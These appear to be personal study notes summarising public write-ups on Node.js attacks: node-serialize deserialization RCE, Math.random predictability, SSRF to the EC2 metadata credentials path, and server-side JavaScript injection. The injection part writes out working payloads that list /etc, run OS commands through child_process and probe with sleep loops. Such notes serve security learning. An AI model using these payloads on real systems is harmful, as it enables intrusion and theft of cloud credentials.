### [Exploiting Node.js deserialization bug for Remote Code Execution](https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/)

- Untrusted data passed into unserialize() function  in node-serialize module can be exploited to achieve arbitrary code execution by passing a serialized JavaScript Object with an Immediately invoked function expression (IIFE).
 
- `serialize-node 0.0.4`
- Cookies value doesn't sanitize the input.
- eval() is use for deserialisation
- [Node Shell Generator](https://github.com/ajinabraham/Node.Js-Security-Course/blob/master/nodejsshell.py)
- You get shell once the server deserialize the cookie ... run the listerer after the request is sent.
- Server decode the base64 value, so encodeing the serialize shell is needed.
 

### [HACKING NODE SERIALIZE](https://blog.websecurify.com/2017/02/hacking-node-serialize.html)

- a node.js app that uses Math.random() is not cryptographically secure.
- trivial to predict the next number given two outputs of the random number generator.
 
cntd... later

### [Exploiting Server Side Request Forgery on a Node/Express Application (hosted on Amazon EC2)](http://sethsec.blogspot.com/2015/12/exploiting-server-side-request-forgery.html) 

 - This means that the server is taking the URL I specified, making a request on my behalf, and then returning the result to me. That right there is SSRF. 
 - https://github.com/sethsec/Nodejs-SSRF-App.git
 - Needle.js (which is what makes the SSRF request). 
 - ifconfig.pro 
 - Accessing the Amazon EC2 Metadata Service -  169.254.169.254
 - /latest/dynamic/instance-identity/document
 -  this request allows an attacker to retrieve the temporary security credentials for the "admins" role, which would allow an attacker to control access to your AWS resources.  :/latest/meta-data/iam/security-credentials/admins
 - http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html
 - 
 
### [Node.Js Server-Side Javascript Injection Detection & Exploitation](https://blog.gdssecurity.com/labs/2015/4/15/nodejs-server-side-javascript-injection-detection-exploitati.html)

 - Burp suites supports SSJS
 - Sleep test still the best aprouch to detech CI as it can detent Blind spot also.
 
			preTax=1;
			var cd;
			var d=new Date();
			do{
			cd=new Date();
			}while(cd-d<10000)
 
 - Error message:

			payload-
			preTax=1;response.end('testvalue9000')
			or
			preTax=1;res.end('testvalue9000')

			Response - 
			ReferenceError: response is not defined

 - Exploitation
	
			Directory Listing
			
				preTax=1;res.end(require('fs').readdirSync('/etc').toString())


	 - child_process allows us to make calls to the OS. 
		 
				preTax=1;
				var exec = require('child_process').exec; 
				var out = exec('touch /tmp/q234f');

 - SpiderMonkey is alos a king of javascriptEngine used my MongoDB>3.2

